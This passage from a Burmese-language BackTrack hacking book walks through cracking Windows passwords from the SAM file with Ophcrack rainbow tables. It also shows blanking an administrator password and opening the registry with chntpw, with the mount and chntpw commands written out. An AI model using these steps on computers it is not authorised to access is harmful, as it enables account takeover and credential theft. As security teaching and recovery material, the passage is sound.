ျပဳလုပ္ထားသင့္ပါသည္။ ထို႕ေနာက္ Download ရရိွလာေသာဖိုင္ကို Unzip ျပဳလုပ္ၿပီး အသံုးျပဳလိုေသာ
Folder တစ္ခုတြင္ထည္႕သြင္းထားရပါမည္။

၃။ ထုိဖိုင္ကို Download ျပဳလုပ္ၿပီးေနာက္တြင္ Ophcrack ကိုဖြင့္ကာ Main Menu မွ Tables တြင္ Click
ႏိွပ္ပါ။

308 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄။ ထို႕ေနာက္ Install ခလုတ္တြင္ Click ႏိွပ္ေပးရပါမည္။

၅။ ထို႕ေနာက္ File ရိွေသာ Folder ကုိေရြးခ်ယ္ပါ။ (Folder အတြင္းသို႕ Click မႏိွပ္ရပါ) ထို႕ေနာက္ Ok တြင္
Click ႏိွပ္ပါ။ ထိုအခါ Rainbow Table ကို Install ျပဳလုပ္ၿပီးျဖစ္ပါလိမ့္မည္။

၆။ Start Menu မွ Applications> BackTrack> Privilege Escalation Password Attacks> Offline


Attacks> Ophcrack-GUI သိ႕ု အဆင့္ဆင့္ေရြးခ်ယ္ေပးရပါမည္။

၇။ ထိ႕ု ေနာက္ Windows Password ကို Recover ျပဳလုပ္မည္႕ Rainbow Table ကိုေရြးခ်ယ္ေပးရပါမည္။
အကယ္၍ Ophcrack ကိုပထမဆံုးအႀကိမ္အသံုးျပဳျခင္း သို႕မဟုတ္ Ophcrack တြင္ Table အသံုးျပဳထား
ျခင္းမရိွခဲ့ပါက အဆင့္ (၃ မွ ၅ အထိ) ေဖာ္ျပထားေသာ Table ကို Install ျပဳလုပ္ျခင္းကို ေရွးဦးစြာ
လုပ္ေဆာင္ေပးရပါမည္။

မ်က္ပြင့္စာေပ 309
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၈။ ထို႕ေနာက္ SAM File ကို ေခၚတင္ေပးရပါမည္။ ထို႕ေၾကာင့္ ေအာက္တြင္ျပထားေသာ ပံုအတိုင္း Load


ခလုတ္တြင္ Click တစ္ခ်က္ႏိွပ္ၿပီးေနာက္ Encrypt ျပဳလုပ္ထားေသာ SAM file ရိွသည္႕ လမ္းေၾကာင္းကို
ေရြးခ်ယ္ေပးရပါမည္။

၉။ ေနာက္ဆံုးတြင္ Crack Button တြင္ Click ႏိွပ္ၿပီးေနာက္ Crack ျပဳလုပ္ျခင္းကို စတင္လုပ္ေဆာင္ေစမည္


ျဖစ္သည္။
310 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕လွ်င္ ယခုအပိုင္းတြင္ Ophcrack အသံုးျပဳပံုကို ေလ့လာခဲ့ၾကၿပီး


Window Password ကို Crack ျပဳလုပ္ရန္ Rainbow Table တစ္ခုလိုအပ္ပံုကိုလည္း ရွင္းျပခဲ့ပါသည္။
Rainbow Table မ်ားသည္ Burte-force attack ျဖင့္ လုပ္ေဆာင္ၿပီး မွန္ကန္ေသာ Password ကို ရရိွေစ
ရန္အတြက္မူရင္း Hash မ်ားႏွင့္ တိုက္ဆိုင္စစ္ေဆးျခင္းတို႕ကို ျပဳလုပ္ေပးပါသည္။

Resetting a Windows Password


ယခုအပိုင္းတြင္မူ chntpw Program ကိုအသံုးျပဳ၍ Window Password မ်ားကို Reset ျပဳလုပ္ျခင္းကို
ေဖာ္ျပေပးပါမည္။ နဂိုမူလအားျဖင့္ Windows သည္ C:\Windows\System32\Config ဟူေသာ Directory
ထဲတြင္ရိွသည္႕ SAM ဖိုင္ႏွင့္ System ဖိုင္မ်ားကို ကာကြယ္ထားေလ့ရိွပါသည္။ ထိုဖိုင္မ်ားကို Windows
စတင္ခ်ိန္တြင္ Password Hash မ်ားကိုတုိက္ဆိုင္စစ္ေဆးရန္အတြက္သာ အသံုးျပဳေလ့ရိွပါသည္။ ထိုသို႕
Reset ျပဳလုပ္မည္႔ ကြန္ပ်ဴတာတြင္ လုပ္ေဆာင္ျခင္းျဖင့္ Security Feature မ်ားကို ထိုးေဖာက္ႏိုင္ရန္အ
တြက္ Password ကို Reset ျပဳလုပ္ေပးရပါမည္။ အကယ္၍ Reset ျပဳလုပ္မည္႕ကြန္ပ်ဴတာကို လက္ေရာက္
အသံုးမျပဳႏိုင္ပါက System အတြင္းတြင္ရိွေသာ Expoiting Security Holes မ်ားကိုအသံုးခ်၍ Access
ျပဳလုပ္ခြင့္ရရိွေစႏိုင္ပါမည္။ ထိုကဲ့သို႕လုပ္ေဆာင္ျခင္းကိုလည္း ယခုအပိုင္းတြင္ေဖာ္ျပေပးထားပါသည္။

ယခုအပိုင္းကိုလုပ္ေဆာင္ရန္အတြက္လိုအပ္ေသာအခ်က္မ်ားမွာ SAM ဖိုင္ကို ၀င္ေရာက္သံုးစြခ


ဲ ြင့္ရရိွႏိုင္ျခင္း
အခ်က္ပင္ျဖစ္ပါသည္။ ထိ႕ု ေၾကာင့္ Reset ျပဳလုပ္မည္႕ ကြန္ပ်ဴတာကို ၀င္ေရာက္သံုးစြခ
ဲ ြင့္ရရိွၿပီးျဖစ္သည္ ဟု
မွတ္ယူပါသည္။

စတင္လုပ္ေဆာင္ရန္အတြက္ Terminal Window ေပၚမွ ေဖာ္ျပပါ အဆင့္မ်ားကိုလုပ္ေဆာင္ျခင္းျဖင့္


ေဆာင္ရြက္ရပါမည္။

၁။ Hard Disk ကို Mount ျပဳလုပ္ရန္အတြက္ ေအာက္ပါ Command ျဖင့္ စစ္ေဆးရပါမည္။

fdisk –l
မ်က္ပြင့္စာေပ 311
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ Mount ျပဳလုပ္ၿပီးေနာက္ Mount Point တြင္ Target ကိုသတ္မွတ္ရပါမည္။

mount /dev/sda1 /target/

၃။ Window SAM file ရိွေသာ လမ္းေၾကာင္းသို႕ Location ကိုေျပာင္းလဲရပါမည္။

cd /target/windows/system32/config

၄။ ထို Directory ထဲတြင္ရိွေသာ Content အားလံုးကို List လုပ္ၾကည္႕ရပါမည္။

ls –al

၅။ chntpw ၏ လမ္းေၾကာင္းသို႕ Location ကိုေျပာင္းလဲရပါမည္။

cd /pentest/passwords/chntpw

၆။ interactive mode အတြင္းတြင္ chntpw ကိုေမာင္းႏွင္ေပးရပါမည္။

./chntpw –I /target/windows/system32/config/SAM

၇။ What to Do ? ဟူေသာ ဧရိယာအတြင္းတြင္ Option 1 ကို ေရြးခ်ယ္၍ User Password မ်ားကို ျပင္ဆင္
ရပါမည္။

၈။ Password တစ္ခုကို Resetting ျပဳလုပ္ရန္ Account တစ္ခုကို အျမင့္ဆံုးေသာ အခြင့္အေရး


(administrative privileges) ျဖင့္အသံုးျပဳရပါမည္။ ထိ႕ု ေၾကာင့္ Administrator Account ကိုေရြးခ်ယ္ပါ
သည္။

၉။ ေနာက္ဆံုးအဆင့္တြင္ ေျပာင္းလဲမည္႕ Password ကိုေရြးခ်ယ္ခိုင္းျခင္းျဖစ္သည္။ Password မရိွဘဲ


Blank (No Password) အေျခအေနျဖင့္ Window ကိုျပန္လည္ဖြင့္လွစ္ႏိုင္ရန္အတြက္ 1 ကိုသာေရြးခ်ယ္
ေပးရပါမည္။ ေနာင္ Windows ကိုျပန္လည္အသံုးျပဳေသာအခါတြင္မွ Password ကိုျပန္လည္ေျပာင္းလဲ
ႏိုင္ပါသည္။

312 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Looking at the Windows registry entries


BackTrack ကိုအသံုးျပဳ၍ Window Reistry Entries ကိုၾကည္႕ရွဳႏိုင္ရန္ အေၾကာင္းအမ်ိဳးမ်ိဳးေၾကာင့္ ျဖစ္ႏိုင္
ပါသည္။ အမ်ားအားျဖင့္ Window မတက္သြားေသာ အေျခအေနတြင္ Window Registry ကုိျပန္လည္
ျပင္ဆင္ျခင္းျဖင့္ Window စနစ္ကို ျပန္လည္ လည္ပတ္ေစႏိုင္ပါသည္။ ထိုသို႕ျပင္ဆင္ရန္အတြက္
BackTrack ကိုအသံုးျပဳႏိုင္ပါသည္။ ထိ႕ု အျပင္ Virus ေၾကာင့္ ပ်က္စီးသြားေသာ Registry အစိတ္အပိုင္း
မ်ားကိုလည္း ျပန္လည္ ျပင္ဆင္ေစႏိုင္ပါသည္။ BackTrack တြင္ Registry entry မ်ားကိုျပန္လည္ျပင္ဆင္
ႏို္င္ေသာ Tool မ်ားပါရိွ၍ ယခုအပိုင္းတြင္ chntpw ကိုအသံုးျပဳကာ BackTrack စနစ္အတြင္း Window
Registry ကို ၾကည္႕ရွဳျခင္းလုပ္ငန္းစဥ္ကို လုပ္ေဆာင္ၾကည္႕ၾကပါမည္။

ယခုအပိုင္းကိုလုပ္ေဆာင္ရန္အတြက္ ေအာက္ပါ လိုအပ္ခ်က္မ်ားကို ရရိွႏိုင္ရပါမည္။

 လက္ေရာက္အသံုးျပဳႏိုင္ေသာ Window စနစ္အသံုးျပဳထားေသာ ကြန္ပ်ဴတာ


 BackTrack စနစ္ထည္႕သြင္းထားေသာ USB Stick သို႕မဟုတ္ CD/DVD တစ္ခ်ပ္ လိုအပ္
ပါမည္။

စတင္လုပ္ေဆာင္ႏိုင္ရန္အတြက္ BackTrack ၏ Terminal Window တြင္လုပ္ေဆာင္ရပါမည္။

၁။ Mount ျပဳလုပ္မည္႕ Hask Disk ကို ေအာက္ပါ Command ျဖင့္စစ္ေဆးေပးရပါမည္။

fdisk –l

၂။ Hard Disk ကို Mount ျပဳလုပ္ၿပီးေနာက္ Mount Point ကဲ့သ႕ို Target ကိုသတ္မွတ္ေပးရပါမည္။

mount /dev/sda1 /target/

၃။ Windows SAM file ရိွေသာ လမ္းေၾကာင္းသို႕ ေအာက္ပါ command ျဖင့္၀င္ေရာက္ေပးရပါမည္။

cd /target/windows/system32/config

၄။ ထို Directory ထဲတြင္ရိွေသာ Content အားလံုးကို List လုပ္ၾကည္႕ရပါမည္။

ls –al
မ်က္ပြင့္စာေပ 313
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၅။ chntpw ရိွေသာလမ္းေၾကာင္းသို႕ ၀င္ေရာက္ေပးရပါမည္။

cd /pentest/passwords/chntpw

၆။ ထို႕ေနာက္ Interactive Mode အတြင္းတြင္ chntpw ကိုေမာင္းႏွင္ေပးရပါမည္။ ယခုေနရာတြင္ ျပင္ဆင္


လိုသည္႕ Registry အမ်ိဳးအစား ကိုေရြးခ်ယ္ေပးရန္ လိုအပ္ပါမည္။

./chntpw –I /target/windows/system32/config

၇။ What to Do? ဟူေသာ ဧရိယာအတြင္းတြင္ User password မ်ားကိုျပင္ဆင္ရန္အတြက္ Option


မ်ားထဲမွ 9 ဟုရိုက္ထည္႕ေပးရပါမည္။

၈။ ထို႕ေနာက္ Window Registry ထဲသ႕ို ၀င္ေရာက္ၿပီးျဖစ္ပါမည္။ Content မ်ားၾကည္႕ရန္အတြက္ Ls


Command ကိုအသံုးျပဳႏိုင္ၿပီး cd Command ကိုအသံုးျပဳ၍ Directory မ်ားကိုေျပာင္းလဲနိုင္ပါသည္။

ls

cd

ယခုအပိုင္းတြင္ chntpw ၏ Registry editor ကိုအသံုးျပဳ၍ Window Registry ကုိ၀င္ေရာက္ျခင္းကို


ေဖာ္ျပခဲ့ပါသည္။ chntpw သည္ SAM ဖိုင္ကို ၀င္ေရာက္ၿပီး Windows Password မ်ားကိုျပန္လည္ ရယူျခင္း
တို႕အတြက္ အလြန္အမင္းအသံုး၀င္ေသာ Tool တစ္ခုျဖစ္သည္။ ထို႕အျပင္ ယခုအေျခအေနအရ Windows
Registry ကိုျပင္ဆင္ျခင္းလုပ္ငန္းစဥ္ကိုလည္း လုပ္ကိုင္ျခင္းကိုလည္း လုပ္ေဆာင္ႏိုင္စြမ္းရိွေၾကာင္း ေတြ႕ရိွ
ရပါသည္။ ၄င္း Tool သည္ အကယ္၍ Registry အတြင္း Error ျဖစ္ျခင္းႏွင့္ Windows Operationg
System ကို မစတင္ႏိုင္ျခင္းတို႕အတြက္ အသံုး၀င္ေစေသာ Tool တစ္ခုအျဖစ္ သတ္မွတ္ႏိုင္ပါသည္။

314 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Conclusion
နိဂံုး

မ်က္ပြင့္စာေပ 315
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Conclusion
ယခုစာအုပ္ပါအေၾကာင္းအရာမ်ားသည္ အဆင့္ျမင့္ Hacking စာအုပ္၏ ကနဦးေျခလွမ္းတစ္ခုျဖစ္ပါသည္။
Hacker ပညာသည္ထိုးေဖာက္ေက်ာ္လႊားရန္အတြက္သာမကဘဲ ထိုသို႕ထိုးေဖာက္၀င္ေရာက္မႈမ်ားကို
ေက်ာ္လႊားရန္ ႀကိဳးပမ္းမႈမ်ားကို ကာကြယ္ရန္လည္းအသံုးခ်ႏိုင္ပါသည္။ ဤစာအုပ္ပါအေၾကာင္းအရာမ်ား
ကိုေလ့လာၿပီးေသာ မ်ိဳးဆက္သစ္လူငယ္မ်ားကို အမွာစကားတစ္ခုျဖင့္ နိဂံုးခ်ဳပ္လိုပါသည္။ ထိုအခ်က္မွာ
Hacking ပညာရပ္သည္ ထင္ေပၚေက်ာ္ေစာလိုမႈေၾကာင့္ေလ့လာရျခင္းမဟုတ္ပါ။ ကြန္ပ်ဴတာပညာကို
တစ္ဖက္ကမ္းေခတ္ကၽြမ္းက်င္တတ္ေျမာက္ၿပီး အနာဂါတ္တြင္ေပၚထြန္းလာသည္႕ နည္းပညာမ်ား၏ ကနဦး
ရင္းႏွီးျမဳပ္ႏွံမႈတစ္ခုသာျဖစ္ေသာေၾကာင့္ မသင့္တင့္မေလ်ာက္ပတ္ေသာ ဆိုစကားမ်ားကို ဆင္ျခင္ထိန္း
သိမ္းေစလိုပါသည္။ ဆက္လက္အႀကံျပဳလိုသည္မွာ တတ္ေျမာက္သမွ်ေသာ ပညာရပ္ျဖင့္ တင္းတိမ္ေရာင့္ရဲ
မေနဘဲ ဆက္လက္ေလ့လာၾကရန္ တိုက္တြန္းပါသည္။

ရဲမင္းေအာင္ (RAY – Electronic)

Telecom Technology

316 မ်က္ပြင့္စာေပ

You might also like